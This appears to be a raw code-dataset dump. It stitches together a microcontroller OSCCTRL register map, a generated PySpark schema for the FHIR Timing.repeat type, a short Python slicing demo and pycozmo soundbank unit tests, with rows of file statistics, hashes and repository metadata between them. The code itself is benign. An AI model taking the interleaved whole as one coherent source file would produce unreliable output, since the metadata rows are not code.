        'DPLL0LTO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LTO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    # STATUS adds XOSCCKSW0/1 (bits 4-5) on top of the interrupt-bit layout.
    # NOTE(review): STATUS names the DPLL timeout bits 'DPLLnTO' whereas the
    # interrupt registers use 'DPLLnLTO' — verify against the datasheet which
    # spelling is intended before relying on either name.
    'STATUS' : ( 0x10, {
        'reg' : 0x00 | ct.UINT32,
        'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCCKSW0' : 0x00 | ct.BFUINT32 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
        'XOSCCKSW1' : 0x00 | ct.BFUINT32 | 5 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0TO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1TO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
        'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    # Two external-oscillator control registers (XOSC0/XOSC1) as an array.
    'XOSCCTRL' : ( 0x14 | ct.ARRAY, 2, {
        'reg' : 0x00 | ct.UINT32,
        'ENABLE' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'XTALEN' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'RUNSTDBY' : 0x00 | ct.BFUINT32 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
        'ONDEMAND' : 0x00 | ct.BFUINT32 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
        'LOWBUFGAIN' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
        'IPTAT' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 2 << ct.BF_LEN,
        'IMULT' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 4 << ct.BF_LEN,
        'ENALC' : 0x00 | ct.BFUINT32 | 15 << ct.BF_POS | 1 << ct.BF_LEN,
        'CFDEN' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
        'SWBEN' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
        'STARTUP' : 0x00 | ct.BFUINT32 | 20 << ct.BF_POS | 4 << ct.BF_LEN,
        'CFDPRESC' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 4 << ct.BF_LEN,
    }),
    'DFLLCTRLA' : ( 0x1C, {
        'reg' : 0x00 | ct.UINT8,
        'ENABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'RUNSTDBY' : 0x00 | ct.BFUINT8 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
        'ONDEMAND' : 0x00 | ct.BFUINT8 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'DFLLCTRLB' : ( 0x20, {
        'reg' : 0x00 | ct.UINT8,
        'MODE' : 0x00 | ct.BFUINT8 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
        'STABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'LLAW' : 0x00 | ct.BFUINT8 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'USBCRM' : 0x00 | ct.BFUINT8 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
        'CCDIS' : 0x00 | ct.BFUINT8 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
        'QLDIS' : 0x00 | ct.BFUINT8 | 5 << ct.BF_POS | 1 << ct.BF_LEN,
        'BPLCKC' : 0x00 | ct.BFUINT8 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
        'WAITLOCK' : 0x00 | ct.BFUINT8 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    'DFLLVAL' : ( 0x24, {
        'reg' : 0x00 | ct.UINT32,
        'FINE' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 8 << ct.BF_LEN,
        'COARSE' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 6 << ct.BF_LEN,
        'DIFF' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 16 << ct.BF_LEN,
    }),
    'DFLLMUL' : ( 0x28, {
        'reg' : 0x00 | ct.UINT32,
        'MUL' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 16 << ct.BF_LEN,
        'FSTEP' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 8 << ct.BF_LEN,
        'CSTEP' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 6 << ct.BF_LEN,
    }),
    'DFLLSYNC' : ( 0x2C, {
        'reg' : 0x00 | ct.UINT8,
        'ENABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLCTRLB' : 0x00 | ct.BFUINT8 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLVAL' : 0x00 | ct.BFUINT8 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
        'DFLLMUL' : 0x00 | ct.BFUINT8 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
    }),
    # Two DPLL instances, each laid out per OSCCTRL_DPLL above.
    'DPLL' : ( 0x30 | ct.ARRAY, 2, OSCCTRL_DPLL ),
}
# Bind the descriptor at the peripheral's fixed bus address to get a live
# register-access object.
OSCCTRL = ct.struct(0x40001000, OSCCTRL_)
| 56.491713
| 76
| 0.52665
| 1,582
| 10,225
| 3.247156
| 0.082174
| 0.189994
| 0.166245
| 0.16352
| 0.88359
| 0.864318
| 0.864318
| 0.769321
| 0.753163
| 0.753163
| 0
| 0.147071
| 0.280489
| 10,225
| 180
| 77
| 56.805556
| 0.551176
| 0
| 0
| 0.60452
| 0
| 0
| 0.106112
| 0
| 0
| 0
| 0.061614
| 0
| 0
| 1
| 0
| false
| 0.00565
| 0.00565
| 0
| 0.00565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2825a87118782445d64d690d81136c3aacb969c
| 27,466
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/timing_repeat.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/timing_repeat.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/timing_repeat.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class Timing_RepeatSchema:
    """
    Specifies an event that may occur multiple times. Timing schedules are used to
    record when things are planned, expected or requested to occur. The most
    common usage is in dosage instructions for medications. They are also used
    when planning care of various kinds, and may be used for reporting the
    schedule to which past regular activities were carried out.
    """

    @staticmethod
    def get_schema(
        max_nesting_depth: Optional[int] = 6,
        nesting_depth: int = 0,
        # Fixed: the generator emitted a mutable default ([]) here; use the
        # None-sentinel idiom instead so no list object is shared across calls.
        nesting_list: Optional[List[str]] = None,
        max_recursion_limit: Optional[int] = 2,
        include_extension: Optional[bool] = False,
        extension_fields: Optional[List[str]] = None,
        extension_depth: int = 0,
        max_extension_depth: Optional[int] = 2,
        include_modifierExtension: Optional[bool] = False,
        use_date_for: Optional[List[str]] = None,
        parent_path: Optional[str] = "",
    ) -> Union[StructType, DataType]:
        """
        Specifies an event that may occur multiple times. Timing schedules are used to
        record when things are planned, expected or requested to occur. The most
        common usage is in dosage instructions for medications. They are also used
        when planning care of various kinds, and may be used for reporting the
        schedule to which past regular activities were carried out.

        id: Unique id for the element within a resource (for internal references). This
        may be any string value that does not contain spaces.
        extension: May be used to represent additional information that is not part of the basic
        definition of the element. To make the use of extensions safe and manageable,
        there is a strict set of governance applied to the definition and use of
        extensions. Though any implementer can define an extension, there is a set of
        requirements that SHALL be met as part of the definition of the extension.
        modifierExtension: May be used to represent additional information that is not part of the basic
        definition of the element and that modifies the understanding of the element
        in which it is contained and/or the understanding of the containing element's
        descendants. Usually modifier elements provide negation or qualification. To
        make the use of extensions safe and manageable, there is a strict set of
        governance applied to the definition and use of extensions. Though any
        implementer can define an extension, there is a set of requirements that SHALL
        be met as part of the definition of the extension. Applications processing a
        resource are required to check for modifier extensions.
        Modifier extensions SHALL NOT change the meaning of any elements on Resource
        or DomainResource (including cannot change the meaning of modifierExtension
        itself).
        boundsDuration: Either a duration for the length of the timing schedule, a range of possible
        length, or outer bounds for start and/or end limits of the timing schedule.
        boundsRange: Either a duration for the length of the timing schedule, a range of possible
        length, or outer bounds for start and/or end limits of the timing schedule.
        boundsPeriod: Either a duration for the length of the timing schedule, a range of possible
        length, or outer bounds for start and/or end limits of the timing schedule.
        count: A total count of the desired number of repetitions across the duration of the
        entire timing specification. If countMax is present, this element indicates
        the lower bound of the allowed range of count values.
        countMax: If present, indicates that the count is a range - so to perform the action
        between [count] and [countMax] times.
        duration: How long this thing happens for when it happens. If durationMax is present,
        this element indicates the lower bound of the allowed range of the duration.
        durationMax: If present, indicates that the duration is a range - so to perform the action
        between [duration] and [durationMax] time length.
        durationUnit: The units of time for the duration, in UCUM units.
        frequency: The number of times to repeat the action within the specified period. If
        frequencyMax is present, this element indicates the lower bound of the allowed
        range of the frequency.
        frequencyMax: If present, indicates that the frequency is a range - so to repeat between
        [frequency] and [frequencyMax] times within the period or period range.
        period: Indicates the duration of time over which repetitions are to occur; e.g. to
        express "3 times per day", 3 would be the frequency and "1 day" would be the
        period. If periodMax is present, this element indicates the lower bound of the
        allowed range of the period length.
        periodMax: If present, indicates that the period is a range from [period] to [periodMax],
        allowing expressing concepts such as "do this once every 3-5 days.
        periodUnit: The units of time for the period in UCUM units.
        dayOfWeek: If one or more days of week is provided, then the action happens only on the
        specified day(s).
        timeOfDay: Specified time of day for action to take place.
        when: An approximate time period during the day, potentially linked to an event of
        daily living that indicates when the action should occur.
        offset: The number of minutes from the event. If the event code does not indicate
        whether the minutes is before or after the event, then the offset is assumed
        to be after the event.
        """
        # Materialize the None sentinels; nesting_list is never mutated below
        # (only read via .count and copied via +), but a fresh list keeps the
        # contract obvious and safe.
        if nesting_list is None:
            nesting_list = []
        if extension_fields is None:
            extension_fields = [
                "valueBoolean",
                "valueCode",
                "valueDate",
                "valueDateTime",
                "valueDecimal",
                "valueId",
                "valueInteger",
                "valuePositiveInt",
                "valueString",
                "valueTime",
                "valueUnsignedInt",
                "valueUri",
                "valueUrl",
                "valueReference",
                "valueCodeableConcept",
                "valueAddress",
            ]
        # Local imports: these schema modules import each other recursively, so
        # importing at call time avoids circular-import failures at module load.
        from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
        from spark_fhir_schemas.r4.complex_types.duration import DurationSchema
        from spark_fhir_schemas.r4.complex_types.range import RangeSchema
        from spark_fhir_schemas.r4.complex_types.period import PeriodSchema
        from spark_fhir_schemas.r4.simple_types.positiveint import positiveIntSchema
        from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
        from spark_fhir_schemas.r4.simple_types.code import codeSchema
        from spark_fhir_schemas.r4.simple_types.time import timeSchema
        from spark_fhir_schemas.r4.simple_types.unsignedint import unsignedIntSchema

        # Stop the recursion: once this type has been visited max_recursion_limit
        # times, or the overall nesting depth is exhausted, collapse to a stub
        # schema containing only the "id" column.
        if (
            max_recursion_limit
            and nesting_list.count("Timing_Repeat") >= max_recursion_limit
        ) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
            return StructType([StructField("id", StringType(), True)])
        # add my name to recursion list for later
        my_nesting_list: List[str] = nesting_list + ["Timing_Repeat"]
        my_parent_path = (
            parent_path + ".timing_repeat" if parent_path else "timing_repeat"
        )
        schema = StructType(
            [
                # Unique id for the element within a resource (for internal references). This
                # may be any string value that does not contain spaces.
                StructField("id", StringType(), True),
                # May be used to represent additional information that is not part of the basic
                # definition of the element. To make the use of extensions safe and manageable,
                # there is a strict set of governance applied to the definition and use of
                # extensions. Though any implementer can define an extension, there is a set of
                # requirements that SHALL be met as part of the definition of the extension.
                StructField(
                    "extension",
                    ArrayType(
                        ExtensionSchema.get_schema(
                            max_nesting_depth=max_nesting_depth,
                            nesting_depth=nesting_depth + 1,
                            nesting_list=my_nesting_list,
                            max_recursion_limit=max_recursion_limit,
                            include_extension=include_extension,
                            extension_fields=extension_fields,
                            extension_depth=extension_depth,
                            max_extension_depth=max_extension_depth,
                            include_modifierExtension=include_modifierExtension,
                            use_date_for=use_date_for,
                            parent_path=my_parent_path,
                        )
                    ),
                    True,
                ),
                # May be used to represent additional information that is not part of the basic
                # definition of the element and that modifies the understanding of the element
                # in which it is contained and/or the understanding of the containing element's
                # descendants. Usually modifier elements provide negation or qualification. To
                # make the use of extensions safe and manageable, there is a strict set of
                # governance applied to the definition and use of extensions. Though any
                # implementer can define an extension, there is a set of requirements that SHALL
                # be met as part of the definition of the extension. Applications processing a
                # resource are required to check for modifier extensions.
                #
                # Modifier extensions SHALL NOT change the meaning of any elements on Resource
                # or DomainResource (including cannot change the meaning of modifierExtension
                # itself).
                StructField(
                    "modifierExtension",
                    ArrayType(
                        ExtensionSchema.get_schema(
                            max_nesting_depth=max_nesting_depth,
                            nesting_depth=nesting_depth + 1,
                            nesting_list=my_nesting_list,
                            max_recursion_limit=max_recursion_limit,
                            include_extension=include_extension,
                            extension_fields=extension_fields,
                            extension_depth=extension_depth,
                            max_extension_depth=max_extension_depth,
                            include_modifierExtension=include_modifierExtension,
                            use_date_for=use_date_for,
                            parent_path=my_parent_path,
                        )
                    ),
                    True,
                ),
                # Either a duration for the length of the timing schedule, a range of possible
                # length, or outer bounds for start and/or end limits of the timing schedule.
                StructField(
                    "boundsDuration",
                    DurationSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path,
                    ),
                    True,
                ),
                # Either a duration for the length of the timing schedule, a range of possible
                # length, or outer bounds for start and/or end limits of the timing schedule.
                StructField(
                    "boundsRange",
                    RangeSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path,
                    ),
                    True,
                ),
                # Either a duration for the length of the timing schedule, a range of possible
                # length, or outer bounds for start and/or end limits of the timing schedule.
                StructField(
                    "boundsPeriod",
                    PeriodSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path,
                    ),
                    True,
                ),
                # A total count of the desired number of repetitions across the duration of the
                # entire timing specification. If countMax is present, this element indicates
                # the lower bound of the allowed range of count values.
                StructField(
                    "count",
                    positiveIntSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".count",
                    ),
                    True,
                ),
                # If present, indicates that the count is a range - so to perform the action
                # between [count] and [countMax] times.
                StructField(
                    "countMax",
                    positiveIntSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".countmax",
                    ),
                    True,
                ),
                # How long this thing happens for when it happens. If durationMax is present,
                # this element indicates the lower bound of the allowed range of the duration.
                StructField(
                    "duration",
                    decimalSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".duration",
                    ),
                    True,
                ),
                # If present, indicates that the duration is a range - so to perform the action
                # between [duration] and [durationMax] time length.
                StructField(
                    "durationMax",
                    decimalSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".durationmax",
                    ),
                    True,
                ),
                # The units of time for the duration, in UCUM units.
                StructField("durationUnit", StringType(), True),
                # The number of times to repeat the action within the specified period. If
                # frequencyMax is present, this element indicates the lower bound of the allowed
                # range of the frequency.
                StructField(
                    "frequency",
                    positiveIntSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".frequency",
                    ),
                    True,
                ),
                # If present, indicates that the frequency is a range - so to repeat between
                # [frequency] and [frequencyMax] times within the period or period range.
                StructField(
                    "frequencyMax",
                    positiveIntSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".frequencymax",
                    ),
                    True,
                ),
                # Indicates the duration of time over which repetitions are to occur; e.g. to
                # express "3 times per day", 3 would be the frequency and "1 day" would be the
                # period. If periodMax is present, this element indicates the lower bound of the
                # allowed range of the period length.
                StructField(
                    "period",
                    decimalSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".period",
                    ),
                    True,
                ),
                # If present, indicates that the period is a range from [period] to [periodMax],
                # allowing expressing concepts such as "do this once every 3-5 days.
                StructField(
                    "periodMax",
                    decimalSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".periodmax",
                    ),
                    True,
                ),
                # The units of time for the period in UCUM units.
                StructField("periodUnit", StringType(), True),
                # If one or more days of week is provided, then the action happens only on the
                # specified day(s).
                StructField(
                    "dayOfWeek",
                    ArrayType(
                        codeSchema.get_schema(
                            max_nesting_depth=max_nesting_depth,
                            nesting_depth=nesting_depth + 1,
                            nesting_list=my_nesting_list,
                            max_recursion_limit=max_recursion_limit,
                            include_extension=include_extension,
                            extension_fields=extension_fields,
                            extension_depth=extension_depth,
                            max_extension_depth=max_extension_depth,
                            include_modifierExtension=include_modifierExtension,
                            use_date_for=use_date_for,
                            parent_path=my_parent_path,
                        )
                    ),
                    True,
                ),
                # Specified time of day for action to take place.
                StructField(
                    "timeOfDay",
                    ArrayType(
                        timeSchema.get_schema(
                            max_nesting_depth=max_nesting_depth,
                            nesting_depth=nesting_depth + 1,
                            nesting_list=my_nesting_list,
                            max_recursion_limit=max_recursion_limit,
                            include_extension=include_extension,
                            extension_fields=extension_fields,
                            extension_depth=extension_depth,
                            max_extension_depth=max_extension_depth,
                            include_modifierExtension=include_modifierExtension,
                            use_date_for=use_date_for,
                            parent_path=my_parent_path,
                        )
                    ),
                    True,
                ),
                # An approximate time period during the day, potentially linked to an event of
                # daily living that indicates when the action should occur.
                # NOTE(review): the docstring documents a "when" element but the
                # generator emitted no StructField for it — confirm against the
                # generator/FHIR spec whether the omission is intentional.
                # The number of minutes from the event. If the event code does not indicate
                # whether the minutes is before or after the event, then the offset is assumed
                # to be after the event.
                StructField(
                    "offset",
                    unsignedIntSchema.get_schema(
                        max_nesting_depth=max_nesting_depth,
                        nesting_depth=nesting_depth + 1,
                        nesting_list=my_nesting_list,
                        max_recursion_limit=max_recursion_limit,
                        include_extension=include_extension,
                        extension_fields=extension_fields,
                        extension_depth=extension_depth + 1,
                        max_extension_depth=max_extension_depth,
                        include_modifierExtension=include_modifierExtension,
                        use_date_for=use_date_for,
                        parent_path=my_parent_path + ".offset",
                    ),
                    True,
                ),
            ]
        )
        # When extensions are excluded, collapse the extension columns to plain
        # strings rather than dropping them, so the column set stays stable.
        if not include_extension:
            schema.fields = [
                c
                if c.name != "extension"
                else StructField("extension", StringType(), True)
                for c in schema.fields
            ]
        if not include_modifierExtension:
            schema.fields = [
                c
                if c.name != "modifierExtension"
                else StructField("modifierExtension", StringType(), True)
                for c in schema.fields
            ]
        return schema
| 53.228682
| 104
| 0.561567
| 2,732
| 27,466
| 5.426794
| 0.108346
| 0.055848
| 0.035411
| 0.051801
| 0.851275
| 0.847835
| 0.844058
| 0.818899
| 0.818899
| 0.813773
| 0
| 0.003195
| 0.395944
| 27,466
| 515
| 105
| 53.332039
| 0.890423
| 0.315008
| 0
| 0.699438
| 1
| 0
| 0.030559
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002809
| false
| 0
| 0.030899
| 0
| 0.042135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b29e9bed686b2a45f86be3103e7229ebf10ea542
| 257
|
py
|
Python
|
concept-of-slicing/slice.py
|
anmolpal1999/python-for-beginners
|
738d73006cf21206cd10ea89d9796669fc141df3
|
[
"MIT"
] | null | null | null |
concept-of-slicing/slice.py
|
anmolpal1999/python-for-beginners
|
738d73006cf21206cd10ea89d9796669fc141df3
|
[
"MIT"
] | null | null | null |
concept-of-slicing/slice.py
|
anmolpal1999/python-for-beginners
|
738d73006cf21206cd10ea89d9796669fc141df3
|
[
"MIT"
] | null | null | null |
# Demo: a slice whose start and stop indices are equal ([1:1]) selects nothing,
# so an empty list is printed between the two separator rules.
SEPARATOR = '-------------------------------------------------------------------------'

print(SEPARATOR)
family = ["Me", "sis", "Papa", "Mummy", "Chacha"]
print(family[1:1])  # start == stop -> empty slice, prints []
print('thank you')
print(SEPARATOR)
| 42.833333
| 83
| 0.241245
| 15
| 257
| 4.133333
| 0.666667
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 0.058366
| 257
| 5
| 84
| 51.4
| 0.247934
| 0
| 0
| 0.4
| 0
| 0
| 0.694444
| 0.579365
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.8
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
a25af66237a375812d2e3bbf336a14a282bfa0b0
| 6,212
|
py
|
Python
|
pycozmo/audiokinetic/tests/test_soundbank.py
|
nalbion/pycozmo
|
35ee1ea741ecf7a39affc38d4ff5ad17865fea16
|
[
"MIT"
] | 123
|
2019-08-25T21:28:23.000Z
|
2022-03-12T13:54:59.000Z
|
pycozmo/audiokinetic/tests/test_soundbank.py
|
nalbion/pycozmo
|
35ee1ea741ecf7a39affc38d4ff5ad17865fea16
|
[
"MIT"
] | 41
|
2019-08-25T21:21:37.000Z
|
2022-02-09T14:20:54.000Z
|
pycozmo/audiokinetic/tests/test_soundbank.py
|
nalbion/pycozmo
|
35ee1ea741ecf7a39affc38d4ff5ad17865fea16
|
[
"MIT"
] | 51
|
2019-09-04T13:30:02.000Z
|
2022-01-09T01:20:24.000Z
|
import unittest
import io
import pycozmo
class TestLoadSoundBank(unittest.TestCase):
    """Tests for the AudioKinetic SoundBank (.bnk) reader in pycozmo."""

    # Minimal valid BKHD (bank header) section shared by every test:
    # 0x20-byte payload, soundbank version 120 (0x78), id 0x44332211.
    HEADER = b"BKHD\x20\0\0\0\x78\0\0\0\x11\x22\x33\x44\0\0\0\0\0\0\0\0\x6b\x0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0"

    @staticmethod
    def _new_reader():
        # Reader with an empty preload map, as every original test used.
        return pycozmo.audiokinetic.soundbank.SoundBankReader({})

    def _load(self, data):
        """Parse *data* as a soundbank named "test" and return it."""
        return self._new_reader().load_file(io.BytesIO(data), "test")

    def test_invalid(self):
        # Empty input cannot supply even a section header.
        with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticIOError):
            self._load(b"")

    def test_invalid2(self):
        # Unknown magic raises a format error, not an I/O error.
        with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticFormatError):
            self._load(b"ZZZZZZZZ")

    def test_empty(self):
        soundbank = self._load(self.HEADER)
        self.assertEqual(soundbank.fspec, "test")
        self.assertEqual(soundbank.id, 0x44332211)
        self.assertEqual(soundbank.name, "")
